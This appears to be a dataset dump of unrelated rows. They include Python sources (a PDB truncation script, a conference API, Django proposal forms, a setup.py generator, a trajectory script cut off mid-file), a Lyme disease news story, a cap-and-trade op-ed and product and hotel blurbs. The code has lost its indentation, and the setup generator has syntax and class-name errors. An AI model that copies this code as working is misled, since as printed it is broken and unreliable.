text
stringlengths 29
850k
|
|---|
#! /usr/bin/python
import sys
my_file = sys.argv[1]
myIdx = my_file.find(".pdb")
fout_name = my_file[:myIdx] + "_trunc.pdb"
my_dict = {}
myMax = []
myMin = []
# Create dictionary with chains as keys and lists of residues as values
with open(my_file,"r") as f:
for line in f:
if "ATOM" in line:
chain = line[21]
if chain in my_dict:
my_dict[chain].append(line[23:26].strip())
else:
my_dict[chain] = [line[23:26].strip()]
else:
pass
# Create lists for Min and Max residues for each chain
for i in my_dict:
myMax.append(max(my_dict[i], key=lambda x:int(x)))
myMin.append(min(my_dict[i], key=lambda x:int(x)))
# Copy input file without Max and Min residues
with open(my_file,"r") as f:
with open(fout_name,"w") as fout:
for line in f:
if "ATOM" in line:
k = 0
for i in my_dict:
#print "if %s in %s and (%s == %s or %s == %s):"%(i,line[21],line[23:26].strip(),myMax[k],line[23:26].strip(),myMin[k])
if i in line[21] and (line[23:26].strip() == myMax[k] or line[23:26].strip() == myMin[k]):
break
elif i in line[21] and (line[23:26].strip() != myMax[k] or line[23:26].strip() != myMin[k]):
fout.write(line)
else:
pass
k += 1
else:
fout.write(line)
|
$37.71 $39.95 Save 6% Current price is $37.71, Original price is $39.95. You Save 6%.
Over 200 examples of successful graphic design, with production specs, using fewer colors and spending fewer dollars.
|
#!/usr/bin/env python
"""
conference.py -- Udacity conference server-side Python App Engine API;
uses Google Cloud Endpoints
$Id: conference.py,v 1.25 2014/05/24 23:42:19 wesc Exp wesc $
created by wesc on 2014 apr 21
"""
__author__ = 'wesc+api@google.com (Wesley Chun)'
from datetime import datetime
import endpoints
from protorpc import messages
from protorpc import message_types
from protorpc import remote
from google.appengine.api import memcache
from google.appengine.ext import ndb
from models import Profile
from models import ProfileMiniForm
from models import ProfileForm
from models import StringMessage
from models import BooleanMessage
from models import Conference
from models import ConferenceForm
from models import ConferenceForms
from models import ConferenceQueryForms
from models import Session
from models import SessionForm
from models import SessionForms
from models import SessionQueryForm
from models import SessionQueryForms
from models import Speaker
from settings import WEB_CLIENT_ID
from settings import ANDROID_CLIENT_ID
from settings import IOS_CLIENT_ID
from settings import ANDROID_AUDIENCE
from utils import getUserId
import process.conferences
import process.sessions
import process.profiles
from process.speakers import MEMCACHE_FEATURED_SPEAKER_KEY
from process.announcements import MEMCACHE_ANNOUNCEMENTS_KEY
EMAIL_SCOPE = endpoints.EMAIL_SCOPE
API_EXPLORER_CLIENT_ID = endpoints.API_EXPLORER_CLIENT_ID
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
CONF_GET_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
websafeConferenceKey=messages.StringField(1),
)
CONF_POST_REQUEST = endpoints.ResourceContainer(
ConferenceForm,
websafeConferenceKey=messages.StringField(1),
)
SESSION_POST_REQUEST = endpoints.ResourceContainer(
SessionForm,
websafeConferenceKey=messages.StringField(1)
)
SESSION_QUERY_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
websafeConferenceKey=messages.StringField(1),
typeOfSession=messages.StringField(2)
)
SESSION_SPEAKER_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
speaker=messages.StringField(1)
)
SESSION_GET_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
websafeSessionKey=messages.StringField(1)
)
SESSION_DATE_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
date=messages.StringField(1)
)
SESSION_DURATION_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
min_duration=messages.IntegerField(1),
max_duration=messages.IntegerField(2)
)
SESSION_FILTER_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
not_type=messages.StringField(1, repeated=True),
start_hour=messages.IntegerField(2),
end_hour=messages.IntegerField(3)
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@endpoints.api(name='conference', version='v1', audiences=[ANDROID_AUDIENCE],
allowed_client_ids=[WEB_CLIENT_ID, API_EXPLORER_CLIENT_ID,
ANDROID_CLIENT_ID, IOS_CLIENT_ID],
scopes=[EMAIL_SCOPE])
class ConferenceApi(remote.Service):
"""Conference API v0.1"""
# - - - Conference objects - - - - - - - - - - - - - - - - -
@endpoints.method(ConferenceForm, ConferenceForm, path='conference',
http_method='POST', name='createConference')
def createConference(self, request):
"""Create new conference."""
return process.conferences.createConferenceObject(request)
@endpoints.method(CONF_POST_REQUEST, ConferenceForm,
path='conference/{websafeConferenceKey}',
http_method='PUT', name='updateConference')
def updateConference(self, request):
"""Update conference w/provided fields & return w/updated info."""
return process.conferences.updateConferenceObject(request)
@endpoints.method(CONF_GET_REQUEST, ConferenceForm,
path='conference/{websafeConferenceKey}',
http_method='GET', name='getConference')
def getConference(self, request):
"""Return requested conference (by websafeConferenceKey)."""
# get Conference object from request; bail if not found
conf = ndb.Key(urlsafe=request.websafeConferenceKey).get()
if not conf:
raise endpoints.NotFoundException((
'No conference found with key: %s'
)% request.websafeConferenceKey)
prof = conf.key.parent().get()
# return ConferenceForm
return process.conferences.copyConferenceToForm(
conf, getattr(prof, 'displayName')
)
@endpoints.method(message_types.VoidMessage, ConferenceForms,
path='getConferencesCreated',
http_method='POST', name='getConferencesCreated')
def getConferencesCreated(self, request):
"""Return conferences created by user."""
# make sure user is authed
user = endpoints.get_current_user()
if not user:
raise endpoints.UnauthorizedException('Authorization required')
user_id = getUserId(user)
# create ancestor query for all key matches for this user
confs = Conference.query(ancestor=ndb.Key(Profile, user_id))
prof = ndb.Key(Profile, user_id).get()
# return set of ConferenceForm objects per Conference
return ConferenceForms(
items=[
process.conferences.copyConferenceToForm(
conf, getattr(prof, 'displayName')
) for conf in confs
]
)
@endpoints.method(ConferenceQueryForms, ConferenceForms,
path='queryConferences',
http_method='POST',
name='queryConferences')
def queryConferences(self, request):
"""Query for conferences."""
conferences = process.conferences.getQuery(request)
# need to fetch organiser displayName from profiles
# get all keys and use get_multi for speed
organizers = [
(ndb.Key(Profile, conf.organizerUserId)) for conf in conferences
]
profiles = ndb.get_multi(organizers)
# put display names in a dict for easier fetching
names = {}
for profile in profiles:
names[profile.key.id()] = profile.displayName
# return individual ConferenceForm object per Conference
return ConferenceForms(
items=[
process.conferences.copyConferenceToForm(
conf, names[conf.organizerUserId]
) for conf in conferences
]
)
# - - - Session objects - - - - - - - - - - - - - - - - - - -
@endpoints.method(SESSION_POST_REQUEST, SessionForm,
path='conference/{websafeConferenceKey}/createSession',
http_method='POST', name='createSession')
def createSession(self, request):
"""Create a new session in selected conference."""
return process.sessions.createSessionObject(request)
@endpoints.method(CONF_GET_REQUEST, SessionForms,
path='conference/{websafeConferenceKey}/sessions',
http_method='GET', name='getConferenceSessions')
def getConferenceSessions(self, request):
"""List all the sessions on the selected conference."""
c_key = ndb.Key(urlsafe=request.websafeConferenceKey)
if not c_key.get():
raise endpoints.NotFoundException(
(
'No conference found with key: %s'
) % request.websafeConferenceKey
)
sessions = Session.query(ancestor=c_key)
sessions = sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(
SESSION_QUERY_REQUEST, SessionForms,
path='conference/{websafeConferenceKey}/sessions/{typeOfSession}',
http_method='GET', name='getConferenceSessionsByType'
)
def getConferenceSessionsByType(self, request):
"""List all the sessions of the selected Type."""
c_key = ndb.Key(urlsafe=request.websafeConferenceKey)
if not c_key.get():
raise endpoints.NotFoundException(
(
'No conference found with key: %s'
) % request.websafeConferenceKey
)
sessions = Session.query(ancestor=c_key)
sessions = sessions.filter(
Session.typeOfSession == request.typeOfSession
)
sessions = sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(SESSION_SPEAKER_REQUEST, SessionForms,
path='conference/sessions/speaker/{speaker}',
http_method='GET', name='getConferenceBySpeaker')
def getSessionsBySpeaker(self, request):
"""List of the sessions by the selected Speaker."""
speaker = Speaker.query(Speaker.name == request.speaker).get()
if not speaker:
raise endpoints.NotFoundException(
'Speaker %s is not registered' % request.speaker
)
sessions = Session.query(Session.speakerId == speaker.key.urlsafe())
sessions = sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(SESSION_DATE_REQUEST, SessionForms,
path='conference/sessions/date',
http_method='GET', name='getSessionsByDate')
def getSessionsByDate(self, request):
"""List of sessions on the selected date."""
sessions = Session.query()
sessions = sessions.filter(
Session.date == datetime.strptime(
request.date[:10], "%Y-%m-%d"
).date()
)
sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(SESSION_DURATION_REQUEST, SessionForms,
path='conference/sessions/duration',
http_method='GET', name='getSessionsByDuration')
def getSessionsByDuration(self, request):
"""List of sessions within the specified duration."""
sessions = Session.query()
sessions = sessions.filter(
Session.duration >= request.min_duration
)
sessions = sessions.filter(
Session.duration <= request.max_duration
)
sessions = sessions.order(Session.duration)
sessions = sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(SESSION_FILTER_REQUEST, SessionForms,
path='conference/sessions/filter',
http_method='GET', name='filterSessions')
def queryProblem(self, request):
"""Filter sessions by time of the day and type of session."""
sessions = Session.query()
sessions = sessions.filter(Session.startTime >= request.start_hour)
sessions = sessions.filter(Session.startTime <= request.end_hour)
sessions = sessions.order(Session.startTime)
items = []
for sess in sessions:
if sess.typeOfSession not in request.not_type:
items.append(process.sessions.copySessionToForm(sess))
return SessionForms(
items=items
)
@endpoints.method(SessionQueryForms, SessionForms,
path='conference/sessions/query',
http_method='GET', name='querySessions')
def querySessions(self, request):
"""Query sessions with user provided filters"""
sessions = process.sessions.getQuery(request)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
# - - - Featured Speaker - - - - - - - - - - - - - - - - - - -
@endpoints.method(message_types.VoidMessage, StringMessage,
path='conference/featured_speaker/get',
http_method='GET', name='getFeaturedSpeaker')
def getFeaturedSpeaker(self, request):
"""Return Featured Speaker from memcache."""
return StringMessage(
data=memcache.get(MEMCACHE_FEATURED_SPEAKER_KEY) or ""
)
# - - - Wishlist - - - - - - - - - - - - - - - - - - - - - - -
@endpoints.method(SESSION_GET_REQUEST, BooleanMessage,
path='addSessionToWishlist/{websafeSessionKey}',
http_method='POST', name='addSessionToWishlist')
def addSessionToWishlist(self, request):
"""Add a session to user Wishlist."""
prof = process.profiles.getProfileFromUser()
session = ndb.Key(urlsafe=request.websafeSessionKey).get()
if not session:
raise endpoints.NotFoundException(
'Session Not Found'
)
if not isinstance(session, Session):
raise endpoints.BadRequestException(
'Element provided is not a Session'
)
prof.sessionsWishlist.append(request.websafeSessionKey)
prof.put()
return BooleanMessage(data=True)
@endpoints.method(message_types.VoidMessage, SessionForms,
path='wishlist', http_method='GET',
name='getSessionsWishlist')
def getSessionsInWishlist(self, request):
"""List sessions saved on user Wishlist."""
prof = process.profiles.getProfileFromUser()
sess_keys = [ndb.Key(urlsafe=wsck) for wsck in prof.sessionsWishlist]
sessions = ndb.get_multi(sess_keys)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
# - - - Profile objects - - - - - - - - - - - - - - - - - - -
@endpoints.method(message_types.VoidMessage, ProfileForm,
path='profile', http_method='GET', name='getProfile')
def getProfile(self, request):
"""Return user profile."""
return process.profiles.doProfile()
@endpoints.method(ProfileMiniForm, ProfileForm,
path='profile', http_method='POST', name='saveProfile')
def saveProfile(self, request):
"""Update & return user profile."""
return process.profiles.doProfile(request)
# - - - Announcements - - - - - - - - - - - - - - - - - - - -
@endpoints.method(message_types.VoidMessage, StringMessage,
path='conference/announcement/get',
http_method='GET', name='getAnnouncement')
def getAnnouncement(self, request):
"""Return Announcement from memcache."""
return StringMessage(
data=memcache.get(MEMCACHE_ANNOUNCEMENTS_KEY) or ""
)
# - - - Registration - - - - - - - - - - - - - - - - - - - -
@endpoints.method(message_types.VoidMessage, ConferenceForms,
path='conferences/attending',
http_method='GET', name='getConferencesToAttend')
def getConferencesToAttend(self, request):
"""Get list of conferences that user has registered for."""
prof = process.profiles.getProfileFromUser() # get user Profile
conf_keys = [
ndb.Key(urlsafe=wsck) for wsck in prof.conferenceKeysToAttend
]
conferences = ndb.get_multi(conf_keys)
# get organizers
organisers = [
ndb.Key(Profile, conf.organizerUserId) for conf in conferences
]
profiles = ndb.get_multi(organisers)
# put display names in a dict for easier fetching
names = {}
for profile in profiles:
names[profile.key.id()] = profile.displayName
# return set of ConferenceForm objects per Conference
return ConferenceForms(
items=[process.conferences.copyConferenceToForm(
conf, names[conf.organizerUserId]
) for conf in conferences]
)
@endpoints.method(CONF_GET_REQUEST, BooleanMessage,
path='conference/{websafeConferenceKey}',
http_method='POST', name='registerForConference')
def registerForConference(self, request):
"""Register user for selected conference."""
return process.conferences.conferenceRegistration(request)
@endpoints.method(CONF_GET_REQUEST, BooleanMessage,
path='conference/{websafeConferenceKey}',
http_method='DELETE', name='unregisterFromConference')
def unregisterFromConference(self, request):
"""Unregister user for selected conference."""
return process.conferences.conferenceRegistration(request, reg=False)
@endpoints.method(message_types.VoidMessage, ConferenceForms,
path='filterPlayground',
http_method='GET', name='filterPlayground')
def filterPlayground(self, request):
"""Filter Playground"""
q = Conference.query()
# field = "city"
# operator = "="
# value = "London"
# f = ndb.query.FilterNode(field, operator, value)
# q = q.filter(f)
q = q.filter(Conference.city == "London")
q = q.filter(Conference.topics == "Medical Innovations")
q = q.filter(Conference.month == 6)
return ConferenceForms(
items=[
process.conferences.copyConferenceToForm(conf,
"") for conf in q
]
)
api = endpoints.api_server([ConferenceApi]) # register API
|
A law allowing the long-term use of antibiotics for the treatment of chronic Lyme disease has been approved by the Legislature and is awaiting Gov. Deval L. Patrick�s signature.
Currently, doctors in Massachusetts are prohibited from prescribing antibiotics to patients with the disease for longer than four weeks, because of complications associated with using antibiotics over a prolonged period of time, and controversy about the existence of a chronic form of Lyme disease, which is caused by a bacterium transmitted by deer ticks.
State Sen. Stephen M. Brewer, D-Barre, a sponsor of the bill, said the antibiotic provision is attached to the state budget for next fiscal year, although no funding is involved.
Mr. Brewer said as it stands now, doctors cannot treat patients based on their judgment, and must send patients out of state to get long-term antibiotics. A similar law, allowing long-term use, was passed in New Hampshire in February. Several other states already allow long-term treatment, he said.
Hundreds of cases of the disease, many in children, are reported annually in Massachusetts � in all areas of the state.
According to information from the state Department of Public Health, prompt antibiotic treatment during the early stage of the disease prevents serious problems later on. The initial sign, which occurs days or weeks after a bite from an infected tick, is a doughnut-like rash appearing where the tick was attached. Flu-like symptoms such as fever, headache, stiff neck, aches and fatigue may also be present.
About 60 percent of those with untreated Lyme disease develop arthritis in the knees, elbows and wrists, which is often chronic. Other long-term effects of untreated Lyme disease include nervous system problems such as meningitis, facial weakness (Bell�s palsy), and weakness in the arms, legs, hands, and feet. Those symptoms can develop months or years after the initial infection.
Usually, Lyme disease can be successfully treated with four weeks of antibiotics.
According to the U.S. Centers for Disease Control and Prevention, antibiotic treatment above and beyond one repeat, four-week round has not been shown to be beneficial and has been linked to serious complications, such as allergic reactions to antibiotics.
There is a divide among health care professionals on how to treat Lyme disease that persists beyond a second round of antibiotics. CDC literature says much of the controversy revolves around whether symptoms reflect continued infection after treatment, and if the Lyme disease bacterium, Borrelia burgdorferi, can even exist in a chronic state following initial antibiotic treatment.
Mr. Brewer, who was horrified when he learned of the long-term consequences of untreated Lyme disease after watching a 90-minute video on the topic given to him by constituents, contends that treatment should be left up to a patient�s doctor.
�It�s a devastating, life-changing, debilitating long-term illness,� he said Monday, pointing out that the Association of American Physicians has endorsed the proposed law.
|
# -*- coding: utf-8 -*-
"""
lang.py: Locale constants
Copyright 2014-2015, Outernet Inc.
Some rights reserved.
This software is free software licensed under the terms of GPLv3. See COPYING
file that comes with the source code, or http://www.gnu.org/licenses/gpl.txt.
"""
from __future__ import unicode_literals
from bottle_utils.i18n import lazy_gettext as _
from ..core.contrib.i18n.consts import LOCALES, LANGS
from ..core.contrib.templates.decorators import template_helper
SELECT_LANGS = [('', _('any language'))] + LANGS
RTL_LANGS = ['ar', 'he', 'ur', 'yi', 'ji', 'iw', 'fa']
def lang_name(code):
""" Return native language name for locale code """
return LOCALES[code]
@template_helper()
def lang_name_safe(code):
""" Return native language name for locale code """
try:
return lang_name(code)
except KeyError:
return _('unknown')
@template_helper()
def is_rtl(code):
return code in RTL_LANGS
@template_helper()
def dir(code):
return 'rtl' if code in RTL_LANGS else 'auto'
@template_helper()
def i18n_attrs(lang):
s = ''
if lang:
# XXX: Do we want to keep the leading space?
s += ' lang="%s"' % lang
if template_helper.is_rtl(lang):
s += ' dir="rtl"'
return s
|
As E&E reported last night, the Attorneys General of Massachusetts, Delaware, Maine, Maryland, Rhode Island, Vermont and California sent a letter this week to Senators Kerry, Graham and Lieberman in which they urge the Senators to incorporate provisions in the climate bill expected to be announced later this month, which save existing state initiatives. Drawing a parallel to California’s emissions standards waiver under the Clean Air Act, they urge coexisting federal and State authority to spur energy independence and reduce global warming pollution.
Some suggestions make a lot of sense for both regulators and the regulated community: allowing time for industries participating in regional programs to transition to federal programs, providing for an exchange of RGGI allowances, and maintaining EPA’s authority under the Clean Air Act to regulate in the absence of functional federal programs created by new legislation could all allow the transition between programs to flow more smoothly.
However, their call to keep cap-and-trade initiatives like RGGI viable in the midst of federal cap-and-trade, and at most impose only a temporary moratorium for a fixed period of time, seems more like a land grab than good policy. The AGs say it would provide a valuable incentive to ensure rigorous implementation and enforcement of the federal program. No. Overlapping cap-and-trade programs would only create a mess. A nationwide and comprehensive cap-and-trade program is clearly preferable, for both the economy and achieving reductions in carbon dioxide emissions.
|
import os
import re
import json
import argparse
import pip
import copy
from collections import OrderedDict
from setuptools import find_packages
BASE_FOLDER = os.path.basename(os.path.abspath('.')).replace(' ', '-').lower()
EXCLUDE_FOLDERS = ['contrib','docs','tests*']
TEXT_FILES = '([A-Za-z]+)(\_[A-Za-z]+)*\.(rst|md)$'
SETUPPY = 'from setuptools import setup\nsetup(\n{args}\n)\n'
CONSOLE_SCRIPT = '^([A-Za-z]+)(\_([A-Za-z]+))*\=([A-Za-z]+(\_[A-Za-z]+)*)(\.[A-Za-z]+(\_[A-Za-z]+)*)*\:([A-Za-z]+)(\_([A-Za-z]+))*$'
CLASSIFIERS = ''.join(open('classifiers.txt')).split('\n')
class ConsoleScripts(OrderedDict):
def add(self)
class Setup(OrderedDict):
def __init__(self, fname='setup.json'):
try:
with open(fname) as f:
setup = json.load(f, object_pairs_hook=OrderedDict)
except IOError:
setup = OrderedDict()
super(Setup, self).__init__(setup)
def __str__(self):
return json.dumps(self, indent=4)
def save(self):
with open(self.file, 'w') as f:
f.write(str(self))
class Setup2(OrderedDict):
def __init__(self):
self.file = 'setup.json'
try:
with open(self.file) as f:
setup = json.load(f, object_pairs_hook=OrderedDict)
except IOError:
setup = OrderedDict()
super(Setup,self).__init__(setup)
def __str__(self): # debug only
return json.dumps(self, indent=4)
def save(self):
with open(self.file, 'w') as f:
f.write(str(self))
def add_console_scripts(self, name, module):
if re.match(CONSOLE_SCRIPT, name+'='+module):
if 'entry_points' not in self.keys():
self['entry_points'] = {}
self['entry_points']['console_scripts'] = {}
self['entry_points']['console_scripts'][name] = module
else:
return 1
def gen(self):
'''generates a new setup.py based on your setup.json'''
setuppy = copy.deepcopy(self)
# - Adjust console scripts
setuppy['entry_points']['console_scripts'] = []
for name, module in self['entry_points']['console_scripts'].items():
setuppy['entry_points']['console_scripts'].append(
'{}={}'.format(name, module)
)
setuppy = json.dumps(setuppy, indent=4)
# - Adjust file based entries
for key in ['long_description']:
if re.match(TEXT_FILES, self[key]) :
setuppy=setuppy.replace(
'"'+self[key]+'"', '"".join(open("'+self[key]+'"))'
)
# - Replacing ":" for "="
for basekey in self.keys():
setuppy = setuppy.replace('"'+basekey+'":', basekey+' =')
setuppy = setuppy[1:-1]
with open('setup.py', 'w') as f:
f.write(SETUPPY.format(args=setuppy))
|
Panasonic not only offers Viera LCD TVs, but also the DIGA Plasma TVs and there are 3 new models, the 50-inch TH-50PX80, 42-inch TH-42PX80 and the 37-inch TH-37PX80.
Panasonic DIGA TH-50PX80 offers a resolution of 1366×768 while the other 2 have a resolution of 1,024×768. The main feature of the 3 new Plasma is the 15,000:1 contrast ratio. They offer 2 HDMI inputs, S0Video and D-Sub.
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django import forms
from django.utils.safestring import mark_safe
from django.utils.timezone import now
from pagedown.widgets import PagedownWidget
from junction.base.constants import (
ConferenceSettingConstants,
ProposalReviewerComment,
ProposalReviewStatus,
ProposalStatus,
ProposalTargetAudience,
ProposalVotesFilter,
)
from junction.proposals.models import (
ProposalSection,
ProposalSectionReviewerVoteValue,
ProposalType,
)
def _get_proposal_section_choices(conference, action="edit"):
if action == "create":
return [
(str(cps.id), cps.name)
for cps in ProposalSection.objects.filter(conferences=conference)
]
else:
return [
(str(cps.id), cps.name)
for cps in ProposalSection.objects.filter(conferences=conference)
]
def _get_proposal_type_choices(conference, action="edit"):
if action == "create":
return [
(str(cpt.id), cpt.name)
for cpt in ProposalType.objects.filter(
conferences=conference, end_date__gt=now()
)
]
else:
return [
(str(cpt.id), cpt.name)
for cpt in ProposalType.objects.filter(conferences=conference)
]
def _get_proposal_section_reviewer_vote_choices(conference):
allow_plus_zero_vote = ConferenceSettingConstants.ALLOW_PLUS_ZERO_REVIEWER_VOTE
plus_zero_vote_setting = conference.conferencesetting_set.filter(
name=allow_plus_zero_vote["name"]
).first()
if plus_zero_vote_setting:
plus_zero_vote_setting_value = plus_zero_vote_setting.value
else:
plus_zero_vote_setting_value = True
values = []
for i in ProposalSectionReviewerVoteValue.objects.all().reverse():
if i.vote_value == 0 and not plus_zero_vote_setting_value:
continue
values.append((i.vote_value, "{}".format(i.description)))
return values
class HorizRadioRenderer(forms.RadioSelect.renderer):
"""
This overrides widget method to put radio buttons horizontally instead of vertically.
"""
def render(self):
"""Outputs radios"""
return mark_safe("\n".join(["%s\n" % w for w in self]))
class ProposalForm(forms.Form):
"""
Used for create/edit
"""
title = forms.CharField(
min_length=10,
help_text="Title of the Proposal",
widget=forms.TextInput(attrs={"class": "charfield"}),
)
description = forms.CharField(
widget=PagedownWidget(show_preview=True), help_text=("Describe your Proposal")
)
target_audience = forms.ChoiceField(
label="Target Audience",
choices=ProposalTargetAudience.CHOICES,
widget=forms.Select(attrs={"class": "dropdown"}),
)
status = forms.ChoiceField(
widget=forms.Select(attrs={"class": "dropdown"}),
choices=ProposalStatus.CHOICES,
help_text=(
"If you choose DRAFT people can't see the session in the list."
" Make the proposal PUBLIC when you're done editing."
),
)
proposal_type = forms.ChoiceField(
label="Proposal Type", widget=forms.Select(attrs={"class": "dropdown"})
)
proposal_section = forms.ChoiceField(
label="Proposal Section", widget=forms.Select(attrs={"class": "dropdown"})
)
# Additional Content
prerequisites = forms.CharField(
label="Pre-requisites",
widget=PagedownWidget(show_preview=True),
required=False,
help_text="What should the participants know before attending your session?",
)
video_url = forms.CharField(
label="Video URL",
required=False,
help_text="Short 1-2 min video describing your talk",
widget=forms.TextInput(attrs={"class": "charfield"}),
)
content_urls = forms.CharField(
label="Content URLs",
widget=PagedownWidget(show_preview=True),
required=False,
help_text="Links to your session like GitHub repo, Blog, Slideshare etc ...",
)
private_content_urls = forms.BooleanField(
help_text="Check the box if you want to make your content URLs private",
label="Make the context URLs private",
required=False,
)
speaker_info = forms.CharField(
label="Speaker Information",
widget=PagedownWidget(show_preview=True),
required=False,
help_text="Say something about yourself, work etc...",
)
is_first_time_speaker = forms.BooleanField(
label="First Time Speaker",
required=False,
help_text="Please mark, if you are a first time speaker for any conference or meetup,"
"not just for PyCon India",
)
speaker_links = forms.CharField(
label="Speaker Links",
widget=PagedownWidget(show_preview=True),
required=False,
help_text="Links to your previous work like Blog, Open Source Contributions etc ...",
)
def __init__(self, conference, action="edit", *args, **kwargs):
super(ProposalForm, self).__init__(*args, **kwargs)
self.fields["proposal_section"].choices = _get_proposal_section_choices(
conference, action=action
)
self.fields["proposal_type"].choices = _get_proposal_type_choices(
conference, action=action
)
@classmethod
def populate_form_for_update(self, proposal):
form = ProposalForm(
proposal.conference,
initial={
"title": proposal.title,
"description": proposal.description,
"target_audience": proposal.target_audience,
"prerequisites": proposal.prerequisites,
"video_url": proposal.video_url,
"content_urls": proposal.content_urls,
"private_content_urls": proposal.private_content_urls,
"speaker_info": proposal.speaker_info,
"speaker_links": proposal.speaker_links,
"is_first_time_speaker": proposal.is_first_time_speaker,
"status": proposal.status,
"proposal_section": proposal.proposal_section.pk,
"proposal_type": proposal.proposal_type.pk,
},
)
return form
class ProposalCommentForm(forms.Form):
"""
Used to add comments
"""
comment = forms.CharField(widget=PagedownWidget(show_preview=True))
private = forms.BooleanField(required=False, widget=forms.HiddenInput())
reviewer = forms.BooleanField(required=False, widget=forms.HiddenInput())
class ProposalReviewForm(forms.Form):
"""
Used to review the proposal.
"""
review_status = forms.ChoiceField(
choices=ProposalReviewStatus.CHOICES, widget=forms.RadioSelect()
)
class ProposalReviewerVoteForm(forms.Form):
"""
Used by ProposalSectionReviewers to vote on proposals.
"""
vote_value = forms.ChoiceField(
widget=forms.RadioSelect(),
label="Do you think this proposal will make a good addition to PyCon India ?",
)
comment = forms.CharField(
widget=forms.Textarea(attrs={"minlength": "30"}),
help_text="Leave a comment justifying your vote.",
)
def __init__(self, *args, **kwargs):
conference = kwargs.pop("conference", None)
super(ProposalReviewerVoteForm, self).__init__(*args, **kwargs)
choices = _get_proposal_section_reviewer_vote_choices(conference)
self.fields["vote_value"].choices = choices
class ProposalTypesChoices(forms.Form):
"""
Base proposal form with proposal sections & types.
"""
proposal_section = forms.ChoiceField(
widget=forms.Select(attrs={"class": "dropdown"})
)
proposal_type = forms.ChoiceField(widget=forms.Select(attrs={"class": "dropdown"}))
def __init__(self, conference, *args, **kwargs):
super(ProposalTypesChoices, self).__init__(*args, **kwargs)
self.fields["proposal_section"].choices = _get_proposal_section_choices(
conference
)
self.fields["proposal_type"].choices = _get_proposal_type_choices(conference)
class ProposalsToReviewForm(ProposalTypesChoices):
"""
Used to filter proposals
"""
reviewer_comment = forms.ChoiceField(
widget=forms.Select(attrs={"class": "dropdown"})
)
def __init__(self, conference, proposal_sections, *args, **kwargs):
super(ProposalsToReviewForm, self).__init__(conference, *args, **kwargs)
ps_choices = [(str(ps.id), ps.name) for ps in proposal_sections]
self.fields["reviewer_comment"].choices = ProposalReviewerComment.CHOICES
self.fields["proposal_section"].choices = ps_choices
for name, field in list(self.fields.items()):
field.choices.insert(0, ("all", "All"))
class ProposalVotesFilterForm(ProposalTypesChoices):
"""
Form to filter proposals based on votes and review_status.
"""
votes = forms.ChoiceField(widget=forms.Select(attrs={"class": "dropdown votes"}))
review_status = forms.ChoiceField(widget=forms.Select(attrs={"class": "dropdown"}))
def __init__(self, conference, *args, **kwargs):
super(ProposalVotesFilterForm, self).__init__(conference, *args, **kwargs)
self.fields["votes"].choices = ProposalVotesFilter.CHOICES
self.fields["review_status"].choices = ProposalReviewStatus.CHOICES
for name, field in list(self.fields.items()):
field.choices.insert(0, ("all", "All"))
|
Casa Ríos is offering accommodations in Biescas. Guests can enjoy city views. All rooms in the guesthouse are equipped with a flat-screen TV. The rooms are equipped with a private bathroom with free toiletries. Guests at Casa Ríos will be able to enjoy activities in and around Biescas, like skiing and cycling. Formigal is 15 miles from the accommodation.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division
import sys
import argparse
import numpy as np
np.set_printoptions(precision=3, suppress=True)
from numpy import cos, sin
# fix imports
sys.path.append('../src')
from vehicle_core.path import trajectory_tools as tt
# constants
T_TYPES = [
'surge',
'sway',
'heave',
'yaw',
'surge+heave',
'sway+heave',
'yaw+heave'
]
def main():
parser = argparse.ArgumentParser(description="Utility for generating navigation trajectories used by navigator module.",
epilog="This is part of vehicle_pilot module.")
parser.add_argument('type', choices=T_TYPES, metavar='type', help='Specify the DOFs used by the trajectory.')
parser.add_argument('n', type=float, help='Initial NORTH coordinate.')
parser.add_argument('e', type=float, help='Initial EAST coordinate.')
parser.add_argument('d', type=float, help='Initial DEPTH coordinate.')
parser.add_argument('y', type=float, help='Initial YAW coordinate.')
parser.add_argument('delta_dof', type=float, metavar='delta_dof', help='Maximum displacement in <type> trajectory.')
parser.add_argument('--output', default='json', help='Output trajectory format.')
parser.add_argument('-v', '--verbose', action='store_true', help='Print detailed information.')
args = parser.parse_args()
# check displacement
if args.delta_dof < 1 or args.delta_dof > 15:
print('Could not generate trajectory with {} maximum displacement.\n'.format(args.delta_dof))
sys.exit(1)
if args.d < 0 or args.d > 3:
print('Could not generate trajectory with {} maximum displacement.\n'.format(args.delta_dof))
sys.exit(1)
if args.y > np.pi or args.y < -np.pi:
print('Could not generate trajectory with {} yaw angle (-pi, pi).\n'.format(args.y))
sys.exit(1)
# waypoints matrix
C = 10
N = 2 * C + 1
WPS = np.zeros((N, 6))
# initial position
INIT = np.array([args.n, args.e, args.d, 0, 0, args.y])
WPS = np.tile(INIT, (N, 1))
# displacements
dw = [args.delta_dof]
# select geometry
if args.type == 'surge':
dof = [0]
elif args.type == 'sway':
dof = [1]
elif args.type == 'heave':
dof = [2]
dw = [min(args.delta_dof, 3)]
elif args.type == 'yaw':
dof = [5]
elif args.type == 'surge+heave':
dof = [0,2]
dw = [args.delta_dof, min(args.delta_dof, 3)]
elif args.type == 'sway+heave':
dof = [1,2]
dw = [args.delta_dof, min(args.delta_dof, 3)]
elif args.type == 'yaw+heave':
dof = [5,2]
